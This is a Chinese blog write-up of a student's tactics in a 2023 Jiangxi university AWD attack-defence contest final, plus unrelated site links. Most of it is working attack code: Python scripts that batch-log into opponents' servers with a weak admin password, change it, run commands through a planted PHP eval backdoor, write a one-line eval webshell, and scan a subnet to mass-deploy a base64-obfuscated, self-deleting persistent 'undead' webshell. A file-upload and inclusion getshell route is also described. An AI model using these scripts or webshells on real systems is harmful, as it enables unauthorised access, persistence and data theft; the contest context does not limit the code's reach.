2023年江西省大学生信息安全技术大赛决赛AWD一些个人解题的思路

已于 2023-11-21 10:13:32 修改
阅读量191 收藏 1
点赞数 1
文章标签: 网络安全
于 2023-11-20 10:35:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64096690/article/details/134501551
版权

关于参加2023年江西省大学生信息安全技术大赛决赛AWD个人思路
有本科和专科组 比赛有60多个组 一个组3个人  权限为普通用户没有sudo权限
由于比赛结束了 那个系统就进不了 了
# WEB1
连接服务器查看运行了什么服务** ps -aux** 或者是通过端口查看**netstat -antlp** 打包网站源码 **tar -zcvf web.tar.gz /var/www/html** 把源码下载到本地用D盾扫描一下

发现存在后门查看一下在/var/www/html/admin/vip.php文件

 但是这个后门在后台找到后台

这边是存在弱口令爆破admin用户密码为q1w2e3r4t5
来到/admin/vip.php这边通过源码看出来Cookie的值username=admin;password=q1w2e3r4t5传参就可以RCE 

这边的话我是进了后台修改了弱口令防止别人也利用 比赛密码不要设置112233.com的弱口令 可以看到这边POST请求传值执行了phpinfo(); 获取flag的话执行system('curl  xxx');就可以了   这边是可以写脚本批量化的 由于我的代码水平有限写出了勉强够用的  如下: 

import requests
proxies = {
    'http': 'http://127.0.0.1:8080'
    }
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
    i = i.strip()
    line = i
    poc1 = line +'/admin/login.php'
def login():
    f = open('url.txt', 'r', encoding='utf-8')
    for i in f:
        i = i.strip()
        line = i
        poc1 = line + '/admin/login.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        data = 'id=1&username=admin&password=q1w2e3r4t5'
        #print(poc1)
        res = requests.post(url=poc1, proxies=proxies, data=data, headers=headres).status_code
        if res ==200:
            new_login_pass()
        else:
            print('密码错误')

def new_login_pass():
    f = open('url.txt', 'r', encoding='utf-8')
    for i in f:
        i = i.strip()
        line = i
        poc2 = line + '/admin/upadmin.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': 'username=admin; password=q1w2e3r4t5'
        }
        data ='id=1&username=admin&password=112233.com'
        res = requests.post(url=poc2,data=data,proxies=proxies,headers=headres).status_code
        if res ==200:
            get_shell()
        else:
            pass

def get_shell():
    f = open('url.txt', 'r', encoding='utf-8')
    for i in f:
        i = i.strip()
        line = i
        poc3 = line + '/admin/vip.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': 'username=admin; password=112233.com;'
        }
        data = "system('cat /flag');"
        res =requests.post(url=poc3,data=data,proxies=proxies,headers=headres).text
        if "flag" in res:
            print("命令执行成功")
            web_shell()
        else:
            pass

def web_shell():
    f = open('url.txt', 'r', encoding='utf-8')
    for i in f:
        i = i.strip()
        line = i
        poc3 = line + '/admin/vip.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': 'username=admin; password=112233.com;'
        }
        data = "system('echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >.1.php');"

        proxies = {
            'http': 'http://127.0.0.1:8080'
        }
        res = requests.post(url=poc3, data=data, proxies=proxies, headers=headres).text

if __name__ == '__main__':
    login()

配合写webshell在比赛前写好的脚本批量写不死马


import concurrent.futures
import time
import requests
import os
import threading
import re



proxy={'http':'http://127.0.0.1:8080'}
# def aa():
#     res = requests.get(url='http://www.baidu.com',proxies=proxy)
#     print(res.status_code)

hander = {
    'Content-Type': 'application/x-www-form-urlencoded'
}



def get_ip(ip,wangduan):
    a = wangduan
    b = a.split('.')  #以点分割字符串
    del b[-1]   #去掉最后一个
    new_ip = '.'.join(b)+'.'+ip  #跑网段内的ip
    return1 = os.popen(f'ping {new_ip} -n 2')  # 执行ping命令 2表示ping2次
    if 'TTL' in return1.read():  # 根据ttl判断是否存在
        with open('ip_true','a+') as f:
            print(new_ip)
            f.write(new_ip+"\n")

def ip():  #多线程快速探索本网段ip
    duan = input('输入本机IP:')
    evnet = threading.Event()
    for i in range(1,255):
        threading.Thread(target=get_ip, args=(str(i),duan)).start()
    evnet.set()


def shel(i,path,payload):
    try:
        url = 'http://' + i + path
        res = requests.post(url=url, data=payload, timeout=3,headers=hander)
        print(i + '  成功写入不死马')
        try:
            if 200 == res.status_code:   #看写入的不死马是否成功
                print(i + '++++++++++++++++++++++成功执行不死马')
                requests.get(url='http://' + i + '/You_is_Dsb.php',timeout=1) #访问执行不死马是默认超时的

        except:
            file = open('nodie_shell', 'r').read().split('\n')
            if i not in file:    #判断已执行不死马ip是否存在,存在则不写入
                with open('nodie_shell', 'a+') as f:
                    f.write(i + "\n")
    except Exception as a:
        print(f'访问默认后门出错ip :{i}')


def shell():
    cmd = input('输入默认后门的密码 :')
    path = input('输入后门路径,例如 /einf/dine.php  :')
    #传参不需base64:
    #payload = {cmd : "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCItZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFnQ2tCbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0NpUmhJRDBnSW40clpDZ3BJbDRpSVhzcmUzMGlPd29rWWlBOUlDUjdKR0Y5V3pjMU9Ea3dNVjA3Q21WMllXd29JbHh1SWk0aVhISWlMaVJpS1RzS1B6ND0iOwogICAgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCR0eHQpOwogICAgZndyaXRlKCRmaWxlLCAkY29udGVudCk7CiAgICBmY2xvc2UoJGZpbGUpOwoJCXVzbGVlcCgxMDAwKTsKCX0KPz4=';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    # 写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成"-debug_backtrace.php",密码758901
    #不死马传参需base64编码:
    # payload = {cmd : "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCItZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFLUUdWeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzS0pHRWdQU0FpZml0a0tDa2lYaUloZXl0N2ZTSTdDaVJpSUQwZ0pIc2tZWDFiTnpVNE9UQXhYVHNLSkdJZ1BTQmlZWE5sTmpSZlpHVmpiMlJsS0NSaUtUc0taWFpoYkNnaVhHNGlMaUpjY2lJdUpHSXBPd28vUGc9PSI7CiAgICAkY29udGVudCA9IGJhc2U2NF9kZWNvZGUoJHR4dCk7CiAgICBmd3JpdGUoJGZpbGUsICRjb250ZW50KTsKICAgIGZjbG9zZSgkZmlsZSk7CgkJdXNsZWVwKDEwMDApOwoJfQo/Pg==';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    # 写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成"-debug_backtrace.php",密码758901

    payload = {cmd: "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCIuZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFLQ2tCbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0NpUmxlSEJsWTNSbFpGUnZhMlZ1SUQwZ0oxaFpXRTVvVFZSSk1GRjFkWFYxTnpNMGVUZ3paM0ozUFQwbk93cHBaaUFvYVhOelpYUW9KRjlUUlZKV1JWSmJKMGhVVkZCZlJFTlVUMHRGVGtWRUoxMHBJQ1ltSUNSZlUwVlNWa1ZTV3lkSVZGUlFYMFJEVkU5TFJVNUZSQ2RkSUQwOVBTQWtaWGh3WldOMFpXUlViMnRsYmlrZ2V3b0pKR1pwYm1RZ1BTQkFKRjlRVDFOVVd5ZFZNbFZwWkROcE1XUW5YVHNLQ1dWMllXd29KR1pwYm1RcE93cDlJR1ZzYzJVZ2V3b0pKSE4wWVhWelgyTnZaR1VnUFNBaVNGUlVVQzh4TGpFZ05EQTBJRTV2ZENCR2IzVnVaQ0k3Q2dsb1pXRmtaWElvSkhOMFlYVnpYMk52WkdVcE93b2dJQ0FnWlhocGRDZ3BPd3A5IjsKICAgICRjb250ZW50ID0gYmFzZTY0X2RlY29kZSgkdHh0KTsKICAgIGZ3cml0ZSgkZmlsZSwgJGNvbnRlbnQpOwogICAgZmNsb3NlKCRmaWxlKTsKCQl1c2xlZXAoMTAwMCk7Cgl9';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    #写入文件You_is_Dsb.php,激活不死马会有自删除功能,不断生成".debug_backtrace.php",密码U2Uid3i1d,需设置请求头"DCTOKENED",值为"XYXNhMTI0Quuuu734y83grw=="

    file = open('ip_true', 'r').read().split('\n')
    while True:
        evnet = threading.Event()
        for i in file:
            time.sleep(0.25)
            if i != '':  #跳过空行
                threading.Thread(target=shel, args=(i,path,payload)).start()

        evnet.set()


if __name__ == '__main__':
    #获取ip
    #ip()
    #执行不死马
    shell()

代码由比赛的环境调试

实现登入弱口令修改弱口令执行命令上传webshell 这边也可以上不死马
这边修复的就是把eval注释掉就可以  比赛环境还有SSRF但是技术有限RCE不了

# WEB2
一样的思路运行了什么服务** ps -aux** 或者是通过端口查看**netstat -antlp** 打包网站源码 **tar -zcvf web.tar.gz /var/www/html** 把源码下载到本地用D盾扫描一下

这边是存在文件包含加文件上传 思路就是配合文件上传.md文件在利用文件包含 getshell

 文件上传源代码

首先上传.md文件里面包含php代码包含执行

上传成功后把文件名重命名了一下 时间戳后md5加密 思路就是burp并发写个死循环运行查看时间戳整理一下md5加密在进行目录扫描获取文件名 比赛由于队伍较多可以写个脚本 批量并发同一时间上传这个包在进行目录扫描获取文件名获取到权限并且上传webshell 

个人思路 比赛中有更厉害的师傅比我简单高效

#PWN

不会

m0_64096690
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD的入门--比赛流程
boomgloom的博客
05-07 360
1、登录自己的ip和端口。
2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
末初的CSDN博客
08-29 6048
第三届江西省高校网络安全技能大赛 线上赛Writeup
2021江西省大学生信息安全技术大赛-线上赛-MISC-STAGA
weixin_46079186的博客
10-24 1006
STAGA-1 cat.png打开一张猫的图片 用StegSolve 打开,发现red、Green、Blue 0通道都有东西 选择0 通道 Prevoew 执行一下发现 base64 编码 解码下 flag{724b4b8e8f1e5523de67c94bb19c2f52} STAGA-2 国际歌.mp3 音频文件 听了一下发现后面一部分没有声音,猜测有东西,分离一下foremost 分离一下得到一张图片 StegSolve 打开 往左点了几下,flag就出来了 flag{y0u_are_sos..
2020江西省大学生信息安全技术大赛Writeup
yescomecn的博客
10-27 2495
2020江西省大学生信息安全技术大赛Writeup 一、WEB 0x01 web1-找色差嘛 题解1-官方 题解2-江西软件职业技术大学 burpsuite 抓包直接改传参,返回包里面存有flag 0x02 web2 这道题好像是官方配置有问题,在一个容器里面有多个漏洞环境,很容易getshell,但是找不到flag,官方最后换了题 题解1-无 0x03 web3-Easy_console 题解1-官方 题解2-江西软件职业技术大学 这题试了挺多方法的 慢日志写shell 失败
第四届“百越杯”福建省高校网络空间安全大赛决赛AWD攻防题目解题思路
SWEET0SWAT的博客
12-26 3022
第四届“百越杯”福建省高校网络空间安全大赛决赛AWD攻防题目解题思路 0x00 前言 AWD网络拓扑 0x01 U-web-fineCMS WEBShell检测 这里没有直接可以利用的webshell,将其和网站上下的源码进行对比,除了第三个文件差别比较多之外,就没有其他的区别了。 漏洞查找 这个FineCMS是开源的代码,所以直接查找是否有现成的漏洞: https://www.freebu...
2020第三届江西省高校网络安全技能大赛 线下赛 CTF&AWD Writeup
末初的CSDN博客
09-19 3700
文章目录CTFMiscBoring_exe!_ezAffineDaylightBlueWebAurora websiteweb2(忘了叫啥名)CryptoInterceptedtelegramAWDAWD1AWD2 CTF Misc Boring_exe !_ ..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!... ..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.
2023“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全
Jay17的博客
09-16 5754
2023“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全
wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛
这周末在做梦的博客
11-06 4814
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1赛题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
第三届江西高校网安大赛线下决赛web解题思路
qq_41743240的博客
09-17 1597
Jeopardy 上午解题模式中,给了两个web web1: 这题上传一个图片.用burp修改php类型上传之后会得到提示,'比比谁速度快',尝试上传.htaccess,也是可以猜想到通过竞争条件一直上传.htaccess,这样再上传一个图片木马,即可获取shell 上传.htaccess脚本 import requests import time while True: files = {'file': ('.hta
2018河北省网络信息安全大赛,HBINS AWD赛程序demo,含数据库.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD-writeup(解析)
12-18
方面的技术技能,检验参赛队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 赛引领专业教学改革,丰富完善学习领域课程建设,使人才培养更贴近 岗位实际,...
2019 5 月 11 日防灾科技学院 “应急挑战杯” 大学生网络安全邀请赛 AWD 靶机题目。.zip
11-09
挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛相关代码、设计文档、使用说明,供参考 挑战杯大赛...
应急挑战杯大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...应急挑战杯大学生网络安全邀请赛 AWD 靶机题目源码+学习说明.zip
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
第一届长城杯 第三赛区 半决赛 AWD 源码
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
企业管理-14狼性精神企业文化.pptx
最新发布
06-14
企业管理-14狼性精神企业文化.pptx
【password输入框的显示和关闭功能进行优化】
06-14
【password输入框的显示和关闭功能进行优化】
网络安全攻防AWDP和AWD的区别
06-06
AWD (Asymmetric Weighted Decay) 和 AWDP (Asymmetric Weighted Decay with Probability) 在网络安全攻防中并不常用,因为它们是用于自然语言处理中的正则化方法。在网络安全攻防中,AWDAWDP 并不是攻击或防御...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值